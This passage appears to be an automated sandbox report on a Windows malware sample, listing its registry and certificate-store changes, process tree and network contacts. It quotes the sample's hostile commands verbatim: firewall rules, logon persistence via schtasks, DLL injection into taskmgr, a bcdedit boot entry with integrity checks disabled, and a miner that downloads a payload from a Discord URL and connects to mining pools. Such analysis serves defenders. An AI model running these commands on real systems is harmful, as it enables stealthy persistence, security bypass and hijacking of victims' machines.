| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Windows\windefender.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509223218.log C:\Windows\Logs\CBS\CbsPersist_20240509223218.cab
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 9860bae9-c6b4-49dc-929d-f0a5c795ebe8.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 131.253.33.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | server5.localstats.org | udp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 74.125.250.129:19302 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
